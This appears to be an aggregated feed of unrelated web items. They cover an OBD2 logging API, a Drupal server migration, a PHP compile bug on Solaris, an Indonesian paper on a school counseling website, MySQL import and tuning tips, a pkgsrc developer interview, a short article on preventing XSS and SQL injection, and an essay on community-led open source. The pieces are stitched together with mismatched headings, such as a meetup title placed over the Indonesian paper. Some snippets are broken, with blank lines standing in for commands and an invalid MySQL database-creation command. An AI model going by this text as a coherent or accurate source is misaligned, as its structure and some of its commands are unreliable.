The API is built in PHP and runs under Apache on a standard Linux VPS. At this point the entire stack has been built. The code's nowhere near production-ready and is missing some features, but it works well enough to demo. I've built a test utility that simulates a client car logging 10 times per second, recording 10 different PIDs each time. This all builds up in the local buffer, and the sync script then clears it out and uploads it to the API. At this rate, the client generates 100 data points per second. For a car driven an average of 101 minutes per day, that's 606,000 data points per day.
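The volume estimate is easy to verify:

```python
# Back-of-the-envelope check of the logging volume quoted above.
logs_per_second = 10    # client logs 10 times per second
pids_per_log = 10       # 10 PIDs captured each time
minutes_driven = 101    # average daily driving time

points_per_second = logs_per_second * pids_per_log        # 100 data points/second
points_per_day = points_per_second * minutes_driven * 60  # 606,000 data points/day
print(points_per_day)  # 606000
```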

The volume of data will add up fast. For starters, the main database table I'm using stores all the PIDs as strings, one record per data point. In the future, I'll evaluate pivoting this data so that each PID has its own field (and appropriate data type) in a table. We'll see which method proves more efficient and easier to query. The OBD2 spec lists all the possible PIDs. Car manufacturers aren't required to use them all, and they can add their own proprietary ones too. Hence my ambivalence, for now, about creating a logging table that contains a field for each PID: if most of the fields are empty, that's a lot of wasted storage.
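The two designs being weighed could look like this — a sketch using SQLite for portability (the real store is MySQL), with column names that are my own illustration rather than the actual schema:

```python
import sqlite3

db = sqlite3.connect(":memory:")

# Current approach: one row per reading, value kept as a string for every PID.
db.execute("""CREATE TABLE obd2_log (
    id    INTEGER PRIMARY KEY,
    ts    REAL,
    pid   TEXT,   -- e.g. '010C' for engine RPM
    value TEXT    -- stored as a string regardless of the PID's real type
)""")

# Possible future pivot: one row per sample, one typed column per PID.
# Sparse (mostly NULL) if a car reports only a few of the possible PIDs.
db.execute("""CREATE TABLE obd2_log_wide (
    id           INTEGER PRIMARY KEY,
    ts           REAL,
    rpm          INTEGER,  -- PID 010C
    coolant_temp INTEGER   -- PID 0105; a full table would need many more columns
)""")

db.execute("INSERT INTO obd2_log (ts, pid, value) VALUES (0, '010C', '2450')")
```

The tall table handles proprietary PIDs for free (any string goes in the `pid` column), while the wide table buys typed columns and simpler per-metric queries at the cost of schema churn and NULL-heavy rows.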

Systems integration is much more of a factor in this project than coding each underlying piece. Each underlying piece, from what I've found, has already been coded somewhere by some enthusiast. The open source Python code already exists for reading OBD2 data. That solves a major coding headache and makes it easier to plug my SDK into it.

There are some useful smartphone apps that can connect to a Bluetooth OBD2 reader to pull the data. Even if they were to use my SDK, it's still not an ideal solution for logging. In order to log this data, you need a dedicated device that's always on when the car's on and always logging. Using a smartphone can get you most of the way there, but there'll be gaps. That's why I'm focusing on using my Pi as a blackbox for this purpose.

          Drupal updates and server migration        

It seems I get more experience with Linux server migrations and Drupal site migrations than I should. Recently I started a phased approach to winding down and closing my company's Rackspace account. Rackspace provides a solid service, but they just weren't meeting my needs. What it came down to is that on the low-mid end, there are much cheaper options. Also, I wasn't fond of the bandwidth bills I was getting. Hosts like Liquid Web, for example, offer 3 TB of transfer as part of the package. Since the sites I host tend to be heavy on images, audio files, and very large documents, it gets pricey.

So I ended up opening a VPS account with Linode. I get plenty of bandwidth, and so far the network seems fast enough. The included bandwidth will make it easier on my cash flow when it comes to podcasts and other large, numerous downloads.

That means I've been spending hours putting together migration documentation. Always have a solid plan, and test it, before migrating production sites. And on top of that, have a rollback plan. There's nothing worse than a site migration gone wrong and no plan to roll it back.

So far I've migrated half a dozen sites, including this one, to Linode from Rackspace. That includes:

  • Nameserver changes
  • DNS setup
  • Apache virtual host setup
  • putting Drupal into Maintenance Mode
  • copying site files over
  • Exporting/importing MySQL db dumps
  • Configuring users and privileges on new server's MySQL db
  • Testing
  • Monitoring

I'm looking forward to lower VPS hosting bills with Linode.

This is the first time I've used Drupal's multi-site installation. All the sites I host are so different that each runs off its own Drupal install. It's a mix of Drupal 6 and Drupal 7. For a new project I've started, I'll be hosting a handful of static content sites. That's where Drupal's multi-site install feature comes into play. Since I never needed it before, I almost forgot about it. But for these small one-off content sites, a shared Drupal install with shared modules and themes will make maintenance a lot easier and less stressful for me. With all the modules a typical Drupal site uses, there's always something that needs to be updated. Multiply that across all the sites I manage and it adds up.

          Comment on MySQL is gone. Here comes MariaDB and Drizzle. by Quique        
It's worth remembering that MariaDB is not the only <i>fork</i> of MySQL. <b>Drizzle</b> (http://www.drizzle.org/) derives from the MySQL 6.0 codebase, but with a redesigned, microkernel-style architecture. Drizzle is a 100% free-software project, led by its community (not by a person who already sold MySQL). It participates actively in GSoC. For more information, visit its website or Wikipedia.
          srinatar@... [2010-03-02 13:25:22]        
Date/time related Bug
Reported by markus.schiegl@...
Tue, 02 Mar 2010 13:25:22 +0000
PHP: 5.2.13, OS: Solaris 10 (Sparc)

PHP 5.2.13 doesn't compile with the Sun Studio compiler on Solaris 10 Sparc. configure works fine (as in 5.2.12); make fails on ext/date/php_date.c with:

/bin/sh /opt/build/php/php-5.2.13/libtool --silent --preserve-dup-deps --mode=compile cc -Iext/date/lib -Iext/date/ -I/opt/build/php/php-5.2.13/ext/date/ -DPHP_ATOM_INC -I/opt/build/php/php-5.2.13/include -I/opt/build/php/php-5.2.13/main -I/opt/build/php/php-5.2.13 -I/opt/build/php/php-5.2.13/ext/date/lib -I/opt/build/php/ext/libxml2/include/libxml2 -I/usr/sfw/include -I/opt/build/php/ext/curl/include -I/opt/build/php/ext/jpeg/include -I/opt/build/php/ext/freetype2/include -I/opt/build/php/ext/freetype2/include/freetype2 -I/opt/build/php/ext/gettext/include -I/opt/build/php/ext/libiconv/include -I/opt/build/php/php-5.2.13/ext/mbstring/oniguruma -I/opt/build/php/php-5.2.13/ext/mbstring/libmbfl -I/opt/build/php/php-5.2.13/ext/mbstring/libmbfl/mbfl -I/opt/build/php/ext/libmcrypt/include -I/opt/build/php/ext/freetds/include -I/opt/build/php/ext/mysql/include -I/opt/build/php/ext/instantclient/sdk/include -I/opt/build/php/ext/tidy/include -I/opt/build/php/ext/xmlrpc-epi/include -I/opt/build/php/ext/libxslt/include -I/opt/build/php/php-5.2.13/TSRM -I/opt/build/php/php-5.2.13/Zend -I/opt/build/php/php/ext/libiconv/include -I/opt/build/php/php/ext/gettext/include -D_POSIX_PTHREAD_SEMANTICS -I/opt/build/php/ext/libiconv/include -O -xs -xstrconst -zlazyload -xmemalign=8s -c /opt/build/php/php-5.2.13/ext/date/php_date.c -o ext/
"/opt/build/php/php-5.2.13/ext/date/php_date.c", line 38: warning: no explicit type given
"/opt/build/php/php-5.2.13/ext/date/php_date.c", line 38: syntax error before or at: long
cc: acomp failed for /opt/build/php/php-5.2.13/ext/date/php_date.c
*** Error code 1
make: Fatal error: Command failed for target `ext/date/php_date.lo'

A diff between 5.2.12 and 5.2.13 shows the culprit (php_date_llabs vs. llabs and/or ifndef HAVE_LLABS, because of bug 50266 and bug 50930)

@@ -30,14 +30,12 @@
 #include "lib/timelib.h"
 #include <time.h>

-#ifndef HAVE_LLABS
-# ifdef PHP_WIN32
-static __inline __int64 llabs( __int64 i ) { return i >= 0? i: -i; }
-# elif defined(__GNUC__) && __GNUC__ < 3
-static __inline __int64_t llabs( __int64_t i ) { return i >= 0 ? i : -i; }
-# elif defined(NETWARE) && defined(__MWERKS__)
-static __inline long long llabs( long long i ) { return i >= 0 ? i : -i; }
-# endif
+#ifdef PHP_WIN32
+static __inline __int64 php_date_llabs( __int64 i ) { return i >= 0? i: -i; }
+#elif defined(__GNUC__) && __GNUC__ < 3
+static __inline __int64_t php_date_llabs( __int64_t i ) { return i >= 0 ? i : -i; }
+#else
+static __inline long long php_date_llabs( long long i ) { return i >= 0 ? i : -i; }
+#endif

 /* {{{ arginfo */

Expected result:
successful compile

Actual result:
compile aborts with error

          25.09.2017: Regional Meetup Halle/Leipzig        
Information and Communication Technology (ICT) has become an inseparable part of the educational process. Limitations of space and time are no longer obstacles to education. The benefits of ICT in education have had a positive impact, particularly on equalizing access to education: every school can have standard, high-quality reference books at the press of a button. Guidance and Counseling, as the part of the school that plays an important role in handling each student's problems relating to social life, personal matters, career, and study, conceptually includes an Information Service program. This information service presents various kinds of school information that can help students complete their studies. A web-based school information service managed by the school's Guidance and Counseling teachers is very useful for students seeking information that supports their academic success. It also enables interactivity between students and Guidance and Counseling teachers for consultation, sharing ideas, online registration for school alumni, and more. A good school information service can also serve as a showcase to the community of the quality of the school and the people in it.
Keywords: school, web, information service, guidance and counseling.

Under the School-Based Curriculum (Kurikulum Tingkat Satuan Pendidikan, KTSP), Guidance and Counseling teachers/counselors provide services related to self-development, in line with students' interests and talents and with the developmental tasks of senior high school (SMA) students, bearing in mind the diversity of individuals (individual differences). Together with homeroom and subject teachers, counselors accompany every learning process. The aim is to help students complete all subjects as optimally as possible according to their academic potential, talents, and interests, so that obstacles and possible failures can be predicted, identified, and addressed early, and to guide students in making choices independently and taking decisions. Guidance and Counseling is delivered through various services that take into account students' personal and social lives, their learning development, and career planning. The forms of service for students can be developed in various ways, according to each school's needs and the characteristics and potential of its region. In today's increasingly advanced technological era, the idea has emerged of using technology as a medium to support the implementation of the Guidance and Counseling program in schools. Conceptually, Guidance and Counseling has four service components, one of which is the Individual Planning Service. Its goal is formulated as facilitating students to create, monitor, and manage their own educational, career, and personal-social development plans. One way to achieve that goal is an information service medium that is flexible and accessible to students anytime and anywhere.
One solution is to build a School Information Service website. Given the limited resources available, a School Information Service website managed by guidance teachers should meet at least four requirements:
1. Easy to use
2. Easy to manage
3. Simple
4. Dynamic
These requirements can be met using a Content Management System (CMS). A CMS can generally be understood as a system that makes it easy for its users to manage and modify the content of a dynamic website without requiring technical knowledge. One CMS that can be used is AuraCMS, released under the GPL (General Public License): open source and freely modifiable, built by the Indonesian community, easy and inexpensive to use, and available in Indonesian. AuraCMS is a collection of PHP scripts that forms a dynamic web portal backed by a MySQL database.
AuraCMS has its own advantages over other CMSes and is easier for non-specialists to learn. A School Information Service built with AuraCMS is dynamic, easy to use, simple, easy to manage, and small in size. AuraCMS can be brought online within about an hour on any of the free hosting services widely offered on the internet. For these reasons, AuraCMS is recommended as a Content Management System for building an information service medium for Guidance and Counseling in schools.

The method used in this study is experimentation, consisting of modification and trial and error. The Content Management System was studied, modified, and tested repeatedly on a local server and on an online server on the internet. All trials followed a trial-and-error approach: if an experiment failed or broke, it was discarded, a new one was built, and it was tested again.

A. The School Information Service
Guidance and Counseling is the part of the school that helps students overcome the problems they face during their studies so they can develop optimally. Every effort is made to build an emotional connection between guidance teachers and students. This is done by realizing the service program already defined as the four service components of guidance and counseling. One of these four components is the Individual Planning Service. Its goal can also be formulated as facilitating students to create, monitor, and manage their own educational, career, and personal-social development plans. Its content and material cover what students need in order to understand their own development in particular. Thus, although individual planning is intended to guide all students, the service provided is individual in nature because it is based on the plans, goals, and decisions determined by each student. Through the individual planning service, students are expected to be able to:
1. Prepare themselves for further education, plan a career, and develop personal-social skills, based on knowledge of themselves and information about school, the world of work, and their community.
2. Analyze their strengths and weaknesses in pursuit of their goals.
3. Measure how far they have achieved their goals.
4. Make decisions that reflect their own plans.

Since some of the service goals above are largely informational, a dynamic web-based Information Service with attractive, easily managed content is needed, i.e. one built on a Content Management System — in this case AuraCMS. A School Information Service can be built with AuraCMS easily, even by users who are unfamiliar with programming languages such as PHP or Java that are normally used to build a website. AuraCMS is made by Indonesians, in Indonesian, and is open source under the General Public License. It has a small file size and is easy to configure manually on a local server or on the free servers available on the internet, which makes it economical. With all this ease of use, the School Information Service can be managed by guidance teachers without having to pay for specialist help.

B. Benefits of AuraCMS Features
Some AuraCMS modules and features that can be used as an information service medium for school Guidance and Counseling are:
1. A Send Article feature that can serve as a confidential electronic-mail channel from students to guidance teachers.
2. A Download feature through which students can download information or assignment files from guidance teachers.
3. A short-message feature for posting brief messages that can be read by everyone.
4. A simple Polling feature that lets every visitor answer the question or statement posted in the polling module.
5. An Online Registration feature for school alumni.

C. Setting Up a Local Server
Prepare the supporting software in points 1, 2, and 3:
1. The XAMPP server package, downloadable from http://www.apachefriends.org.
2. A web browser, such as Internet Explorer or Mozilla Firefox.
3. The AuraCMS files, downloadable from http://www.auracms.org.
4. Install the server package on the PC that will be used as the server.
5. After installation is complete, start Apache and MySQL.
6. Create a folder named sekolah (or any other name) under C:/xampp/htdocs and extract the AuraCMS files into it.
7. Open the browser and go to http://localhost/phpmyadmin; the phpMyAdmin interface will appear.
8. Create a database named sekolah and click Create.
9. Then import the SQL file located in C:/xampp/htdocs/sekolah.
10. Once the database is created and the SQL file has been imported successfully, edit C:/xampp/htdocs/sekolah/includes/config.php so that the database name matches the one created in step 8.
11. Open the browser and go to http://localhost/sekolah; the AuraCMS web portal will appear.
12. The website on the local server is now ready. Good luck!

D. Setting Up an Online Server

1. Create a free subdomain at http://www.freewebhosting.com, e.g. http://sekolah.coolpage.biz.
2. The database name and username are usually identical and are created automatically by the hosting provider; both typically consist of several digits, e.g. 12345.
3. Enter the database name you received into the config.php file in the AuraCMS files.
4. Zip the AuraCMS files and upload the archive via http://www.net3ftp.com.
5. When the upload is finished, open a new browser window and enter the subdomain you created.
6. The School Information Service is now online; the whole process takes no more than about an hour and is free.

E. Screenshots of the School Guidance and Counseling Information Service on the Local Server

Figure 1. The front page

Figure 2. The alumni registration page

Figure 3. The geographic information system page showing the school's location

Figure 4. The photo gallery page

Figure 5. The guestbook page, used as a consultation facility

Figure 6. The articles page, used as a news facility

Figure 7. The download page, used for assignments

This school information service can be used as an information service medium in school Guidance and Counseling activities to increase interactivity between guidance teachers and students. It can also serve as supporting information that helps students develop their personal, social, academic, and career potential.

Praise be to Allah SWT, by whose grace and blessing of health the author was able to complete this paper. This paper, entitled "Perancangan Layanan Informasi Berbasis Web Pada Program Kegiatan Bimbingan Dan Konseling Disekolah" (Designing a Web-Based Information Service for School Guidance and Counseling Programs), is one expression of the author's dedication to advancing the counseling profession and Guidance and Counseling at the University of Lampung in particular and in Indonesia in general. The author would like to thank:
a) Prof. Dr. Sudjarwo, M.S., Dean of the Faculty of Teacher Training and Education, University of Lampung;
b) Drs. Danial Achmad, M.Pd., Head of the Department of Educational Sciences, Faculty of Teacher Training and Education, University of Lampung;
c) Drs. Muswardi Rosra, M.Pd., Head of the Guidance and Counseling Study Program, Department of Educational Sciences, Faculty of Teacher Training and Education, University of Lampung;
d) Drs. Giyono, M.Pd., the author's supervisor, for his guidance, suggestions, and constructive criticism during the completion of this paper;
e) Fellow Guidance and Counseling students at the University of Lampung for their motivation.
f) Colleagues at AssalamNET for their help and participation.



I don't use Sakura myself, so I don't know what character encoding its default configuration uses, but how about converting the SQL file to UTF-8, EUC, or Shift JIS and then importing it again?






SET NAMES sjis ;





  • Upload the SQL file to the server via scp or ftp
    • To be safe, disable any character-encoding conversion or automatic text conversion your client software may have
  • Load the SQL into MySQL from the command line:
mysql -u <your Sakura MySQL account name> -p <database name> < <the SQL file you uploaded>


mysql -u <your Sakura MySQL account name> -p create <database name>

Incidentally, MySQL 4.0 has no automatic character-encoding conversion, so as far as just creating tables and adding records goes, I don't think you need to worry about it much.
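The re-encoding step suggested above can be sketched in Python; the byte-level round trip is the same whether the dump is read from a string or a file (the file names in the comment are made up for the example):

```python
# Sketch: re-encode a SQL dump (here Shift JIS -> UTF-8) before importing it.
data = "INSERT INTO posts VALUES ('日本語テキスト');"

sjis_bytes = data.encode("cp932")        # cp932 is the Windows Shift JIS variant
text = sjis_bytes.decode("cp932")        # read it back with the correct codec...
utf8_bytes = text.encode("utf-8")        # ...and write it out as UTF-8

# With files, the same idea would be:
#   raw = open("dump.sql", "rb").read()
#   open("dump_utf8.sql", "wb").write(raw.decode("cp932").encode("utf-8"))
```

Decoding with the wrong codec at this step is exactly what produces mojibake in the imported tables, which is why the client-side auto-conversion mentioned above should be disabled.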

          We develop web and Android apps at low prices        
Languages: html, css, javascript, jquery, php, mysql, java, android, etc. - websites - mobile web - ...
          Fine Tuning MySQL Server To Achieve Faster Website Loading        

All popular blogging platforms and Content Management Systems (CMS) like Drupal, WordPress, and Joomla make extensive use of a database back-end, and having a fine-tuned database server is crucial to achieving optimal performance with them. As the saying goes, "one size does not fit all": the default my.cnf that ships with MySQL server needs adjusting to your scripts' requirements and hardware configuration. Thankfully, there are free tools to get this done effectively and easily.

Today, I will show two scripts and a simple tip that will help us optimize our databases for maximum performance. Before proceeding, keep in mind that this is quite advanced: it requires editing database configuration files and working via shell access as the Linux root user on your server.

          Analyze, check, auto-repair and optimize Mysql Database        
$ mysqlcheck -a --auto-repair -c -o -uroot -p [DB]

A useful way to do a full check and auto-repair damaged databases.



          pkgsrc 50th release interviews - Jonathan Perkin        

The pkgsrc team has prepared the 50th release of their package management system, the 2016Q1 version. It's an infrequent sort of milestone: the 100th release won't arrive for another 50 quarters.

The NetBSD team has prepared a series of interviews with the developers. This one is with Jonathan Perkin, a developer on the Joyent team.

Hi Jonathan, please introduce yourself.

Hello! Thirty-something, married with 4 kids. Obviously this means life is usually pretty busy! I work as a Software Engineer for Joyent, where we provide SmartOS zones (also known as "containers" these days) running pkgsrc. This means I am in the privileged position of getting paid to work full-time on what for many years has been my hobby.

First of all, congratulations on the 50th release of pkgsrc! How do you feel about this anniversary?

I've been involved in pkgsrc since 2001, which was a few years before we started the quarterly releases. Back then and during the early 2000s there was a significant amount of work going into the pkgsrc infrastructure to give it all the amazing features that we have today, but that often meant the development branch had some rough edges while those features were still being integrated across the tree.

The quarterly releases gave users confidence in building from a stable release without unexpected breakages, and also helped developers to schedule any large changes at the appropriate time.

At Joyent we make heavy use of the quarterly releases, producing new SmartOS images for each branch, so for example our 16.1.x images are based on pkgsrc-2016Q1, and so on.

Reaching the 50th release makes me feel old! It also makes me feel proud that we've come a long way, yet still have people who want to be involved and continue to develop both the infrastructure and packages.

I'd also like to highlight the fantastic work of the pkgsrc releng team, who work to ensure the releases are kept up-to-date until the next one is released. They do a great job and we benefit a lot from their work.

What are the main benefits of the pkgsrc system?

For me the big one is portability. This is what sets it apart from all other package managers (and, increasingly, software in general), not just because it runs on so many platforms but because it is such a core part of the infrastructure and has been constantly developed and refined over the years. We are now up to 23 distinct platforms, not counting different distributions, and adding support for new ones is relatively easy thanks to the huge amount of work which has gone into the infrastructure.

The other main benefit for me is the buildlink infrastructure and various quality checks we have. As someone who distributes binary packages to end users, it is imperative that those packages work as expected on the target environment and don't have any embarrassing bugs. The buildlink system ensures (amongst other things) that dependencies are correct and avoids many issues around build host pollution. We then have a number of QA scripts which analyse the generated package and ensure that the contents are accurate, RPATHs are correct, etc. It's not perfect and there are more tests we could write, but these catch a lot of mistakes that would otherwise go undetected until a user submits a bug report.

Others for me are unprivileged support, signed packages, multi-version support, pbulk, and probably a lot of other things I've forgotten and take for granted!

Where and how do you use pkgsrc?

As mentioned above, I work on pkgsrc for SmartOS. We are probably one of the biggest users of pkgsrc in the world, serving our users over a million package downloads per year (and rising), not including packages distributed as part of our images or delivered from mirrors. This is where I spend the majority of my time working on pkgsrc, and it is all performed remotely on a number of zones running in the Joyent Public Cloud. The packages we build are designed to run not just on SmartOS but across all illumos distributions, so I also have an OmniOS virtual machine locally where I test new releases before announcing them.

As an OS X user, I also use pkgsrc on my MacBook. This is generally where I perform any final tests before committing changes to pkgsrc so that I'm reasonably confident they are correct, but I also install a bunch of different packages from pkgsrc (mutt, ffmpeg, nodejs, jekyll, pstree etc) for my day-to-day work. I also have a number of Mac build servers in my loft and at the Joyent offices in San Francisco where I produce the binary OS X packages we offer which are starting to become popular among users looking for an alternative to Homebrew or MacPorts.

Finally, I have a few Linux machines also running in the Joyent Public Cloud which I have configured for continuous bulk builds of pkgsrc trunk. These help me to test any infrastructure changes I'm working on to ensure that they are portable and correct.

On all of these machines I have written infrastructure to perform builds inside chroots, ensuring a consistent environment and allowing me to work on multiple things simultaneously. They all have various tools installed (git, pkgvi, pkglint, etc) to aid my personal development workflow. We then make heavy use of GitHub and Jenkins to manage automatic builds when pushing to various branches.

What are the pkgsrc projects you are currently working on?

One of my priorities over the past year has been on performance. We build a lot of packages (over 40,000 per branch, and we support up to 4 branches simultaneously), and when the latest OpenSSL vulnerability hits it's critical to get a fix out to users as quickly as possible. We're now at the stage where, with a couple of patches, we can complete a full bulk build in under 3 hours. There is still a lot of room for improvement though, so recently I've been looking at slibtool (a libtool replacement written in C) and supporting dash (a minimal POSIX shell which is faster than bash).

There are also a few features we've developed at Joyent that I continue to maintain, such as our multiarch work (which combines 32-bit and 64-bit builds into a single package), additional multi-version support for MySQL and Percona, SMF support, and a bunch of other patches which aren't yet ready to be integrated.

I'm also very keen on getting new users into pkgsrc and turning them into developers, so a lot of my time has been spent on making pkgsrc more accessible, whether that's via our pkgbuild image (which gives users a ready-made pkgsrc development environment) or the developer guides I've written, or maintaining our https://pkgsrc.joyent.com/ website. There's lots more to do in this area though to ensure users of all abilities can contribute meaningfully.

Most of my day-to-day work though is general bug fixing and updating packages, performing the quarterly release builds, and maintaining our build infrastructure.

If you analyze the current state of pkgsrc, which improvements and changes do you wish for the future?

More users and developers! I am one of only a small handful of people who are paid to work on pkgsrc, the vast majority of the work is done by our amazing volunteer community. By its very nature pkgsrc requires constant effort updating existing packages and adding new ones. This is something that will never change and if anything the demand is accelerating, so we need to ensure that we continue to train up and add new developers if we are to keep up.

We need more documentation, more HOWTO guides, simpler infrastructure, easier patch submission, faster and less onerous on-boarding of developers, more bulk builds, more development machines. Plenty to be getting on with!

Some technical changes I'd like to see are better upgrade support, launchd support, integration of a working alternative pkg backend e.g. IPS, bmake IPC (so we don't need to recompute the same variables over and over), and many more!

Do you have any practical tips to share with the pkgsrc users?

Separate your build and install environments, so e.g. build in chroots or in a VM then deploy the built packages to your target. Trying to update a live install is the source of many problems, and there are few things more frustrating than having your development environment be messed up by an upgrade which fails part-way through.

For brand new users, document your experience and tell us what works and what sucks. Many of us have been using pkgsrc for many, many years and have lost the newcomer's unique ability to identify problems, inconsistencies, and bad documentation.

If you run into problems, connect to Freenode IRC #pkgsrc, and we'll try to help you out. Hang out there even if you aren't having problems!

Finally, if you like pkgsrc, tell your friends, write blog posts, post to Hacker News etc. It's amazing to me how unknown pkgsrc is despite being around for so long, and how many people love it when they discover it.

More users leads to more developers, which leads to improved pkgsrc, which leads to more users, which...

What's the best way to start contributing to pkgsrc and what needs to be done?

Pick something that interests you and just start working on it. The great thing about pkgsrc is that there are open tasks for any ability, from documentation fixes all the way through adding packages to rewriting large parts of the infrastructure.

When you have something to contribute, don't worry about whether it's perfect or how to deliver it. Just make it available and let us know via a PR, a pull request, or plain mail, and we can take it from there.

Do you plan to participate in the upcoming pkgsrcCon 2016 in Kraków (1-3 July)?

I am hoping to. I usually give a talk on what we've been working on at Joyent over the past year, and will probably do the same this time.




          Your Xtrabackup Cheat Sheet        
Ivan Groenewold, MySQL Database Consultant at Pythian, provides examples of useful operations using xtrabackup.
          MySQL encrypted streaming backups directly into AWS S3        
Overview Cloud storage is becoming more and more popular for offsite storage and DR solutions for many businesses. This post will help those who want to perform MySQL backups directly into Amazon S3 Storage. These...
          Web Security, Cross Site Scripting and PHP        
Most of the world's websites rely heavily on complex web applications in which both sensitive and non-sensitive data are exchanged. Web security is not only about money transactions; it also covers personal information, which may be very sensitive. We tend to assume that the web page we are looking at has the same origin. Most users worry about security, but nobody can be sure their information is safe, even on well-known web applications like Facebook or Gmail.
A year ago I heard that Facebook was attacked by malicious spam; maybe you were one of the victims. How was that possible? In truth, no security measure is out of a hacker's reach. When I was researching how an attacker can compromise a website, I came across cross-site scripting.
What is cross-site scripting?
Cross-site scripting, commonly abbreviated XSS, is a hacking technique that leverages vulnerabilities in the code of a web application to let an attacker send malicious content to an end user and collect data from the victim. Cross-site scripting attacks are therefore a special case of code injection. There is no single, standardized classification of cross-site scripting attacks.
In an XSS attack, the attacker executes a fragment of JavaScript, ActiveX, Java, VBScript, Flash, or even plain HTML in the security context of the targeted domain.
How to prevent XSS?
Several prevention methods are available; Wikipedia lists threat-reduction techniques and related links. Here I add some extra information for PHP developers, which was the actual area of interest of my research.
As a first step, a PHP developer can protect a web page from XSS using a code snippet along the following lines:
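A minimal sketch of the escaping idea (the function name `safe_echo` is illustrative, not from any library):

```php
<?php
// Escape user-supplied text before echoing it into HTML, so any
// embedded markup is rendered inert instead of executed.
function safe_echo(string $userInput): string
{
    return htmlspecialchars($userInput, ENT_QUOTES, 'UTF-8');
}

echo safe_echo('<script>alert(1)</script>');
```

Any `<`, `>`, `&` and quote characters in the input are converted to HTML entities, so an injected script tag is displayed as text rather than run by the browser.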


Along with code injection, SQL injection is also possible: an attacker can alter or craft a SQL query to expose hidden data, override valuable data, or even execute dangerous system-level commands on the database host. Using common table and column names such as 'id', 'username', and 'password' makes this easier for the attacker.
Some precautions suggested by php.net are:
  • Never connect to the database as a superuser or as the database owner. Always use customized users with very limited privileges. 
  • Use prepared statements with bound variables. They are provided by PDO, by MySQLi and by other libraries.
  • Check if the given input has the expected data type. PHP has a wide range of input validating functions, from the simplest ones found in Variable Functions and in Character Type Functions (e.g. is_numeric(), ctype_digit() respectively) and onwards to the Perl compatible Regular Expressions support.
  • If the application waits for numerical input, consider verifying data with ctype_digit(), or silently change its type using settype(), or use its numeric representation by sprintf().
  • If the database layer doesn't support binding variables then quote each non numeric user supplied value that is passed to the database with the database-specific string escape function (e.g. mysql_real_escape_string(), sqlite_escape_string(), etc.). Generic functions like addslashes() are useful only in a very specific environment (e.g. MySQL in a single-byte character set with disabled NO_BACKSLASH_ESCAPES) so it is better to avoid them.
  • Do not print out any database specific information, especially about the schema, by fair means or foul. See also Error Reporting and Error Handling and Logging Functions.
  • You may use stored procedures and previously defined cursors to abstract data access so that users do not directly access tables or views, but this solution has other impacts. 
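The prepared-statement advice above can be sketched with PDO and an in-memory SQLite database (the table and column names are illustrative):

```php
<?php
// Sketch of prepared statements with bound variables, using PDO
// and an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)');
$db->prepare('INSERT INTO users (username, password) VALUES (?, ?)')
   ->execute(['alice', 'secret']);

// Bound variables keep user input out of the SQL text entirely,
// so a classic injection attempt simply matches no row:
$evil = "alice' OR '1'='1";
$stmt = $db->prepare('SELECT id FROM users WHERE username = ?');
$stmt->execute([$evil]);
$row = $stmt->fetch(PDO::FETCH_ASSOC);   // no such username

// A bound lookup with the real username still works:
$stmt->execute(['alice']);
```

Because the query text and the data travel separately, the quoting tricks that break string-concatenated SQL have no effect.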
Thank you for reading this article.

          Community First!        

The current release of MySQL shows the problems faced by free and open source software projects that put business first and community second. Michael “Monty” Widenius criticizes the current development model of MySQL in his blog and recommends not using the current release, 5.1, of the database system.

The reason I am asking you to be very cautious about MySQL 5.1 is that there are still many known and unknown fatal bugs in the new features that are still not addressed.

Monty points out the problems that stem from having a company take the lead in the development of a free software system: the company needs something to sell, fast. In this article I support Monty's view and discuss it in regard to Freifunk and LXDE. I believe communities must take the lead in order to make and keep a project on the bleeding edge; however, we should work together with companies (like FON.com for Freifunk or ASUS for LXDE) and exchange resources. Both sides can profit. In the end, open and free community projects are all about cooperation.

In his blog entry Monty gives some reasons why the MySQL development department once again has a quality problem with the release. The problems range from MySQL 5.1 being declared a release candidate too early (for commercial reasons), to focusing too much on new features rather than on quality (for commercial reasons), to involving developers who are not experienced in developing database systems (Mario: maybe because they do not come from the community?), to not keeping the development open for testing and participation by the community, and more.

As I said in my talk at the MySQL users conference, I think it’s time to seriously review how the MySQL server is being developed and change the development model to be more like Drizzle and PostgreSQL where the community has a driving role in what gets done! (http://monty-says.blogspot.com/2008/11/oops-we-did-it-again-mysql-51-rel...)

What can free software and other open source projects learn from this? The conclusion is clear: projects that want to stay on the bleeding edge of technology, with quality code and widespread support, must put the community first.

In the projects I participate in - e.g. Freifunk, LXDE, FOSS Bridge - I always work hard to bring the community together, to grow it, and to keep and foster it. This is not always easy. The people involved have different expectations and goals, and outside circumstances change, with both positive and negative effects.

For example, even though the Freifunk community was in the spotlight many times over the last two years, it seemed to be stagnating somehow. We had put a lot of resources into rebuilding the website and fostering more exchange, but with the broader availability of broadband in some districts of Berlin, for example, people became less motivated to participate just to get constant Internet access. Additionally, new business models seemed to draw people away from Freifunk to offerings that looked easier to use and promised many things similar to Freifunk. However, Freifunk is more than the mere exchange of free Internet access. The idea of Freifunk is to build a local network - the public space in cyberspace - but we did not have tools simple enough to give everyone the chance to build that local network with the limited resources (especially time!) that people have. We are getting there, though, with simpler software and easier-to-use devices.

FON.com received mixed reactions in the core groups of the global Freifunk community when it started, ranging from refusing any connection with FON to trying to ignore it. Some welcomed FON and its involvement. FON pays some of the core OpenWRT developers (OpenWRT is the base of the Freifunk firmware), and it offers new hardware that can also be used by the Freifunk community. Personally I do not mind working together with FON. As I see it, we have to be pragmatic; everyone has to make a living, and the Freifunk community could profit from the involvement of FON and other companies. I would leave the decision of whether people from the community work for and with FON to each person. At a recent meeting in Berlin I discussed this a bit with Martin Varsavsky. Martin actually asked me how FON could work together more with the Freifunk community.

We should be clear here, though: FON and Freifunk are two very different things. FON is a company that labels its participants (actually its customers) a community. Freifunk is a community of many different people - students, engineers, scientists, free and open source activists, people who want Internet access, people who want a truly free network, people using it for their business, people working in development cooperation, and so on. People have different motivations to participate in Freifunk: interest in technology and development, Internet access, interest in new ideas and projects, inspiration by the idea of freedom, a way to make a living. These people would not participate if Freifunk were a commercial operation. I remember the saying "money destroys the community". I believe it was coined with exactly this in mind.

Still, we should not be absolutist here; we should acquire resources and money for the community - for conferences, events, hardware for developers, funding for projects, and so on. Based on my experience of the last years, communities need resources. We should study successful models of communities that have managed to channel resources to the people really doing the work. Associations, foundations and similar organisations are very helpful here, as they keep things transparent and offer newcomers entry points. Companies that would like to support projects also find it easier to talk to someone from the community if there is a working organisation in place.

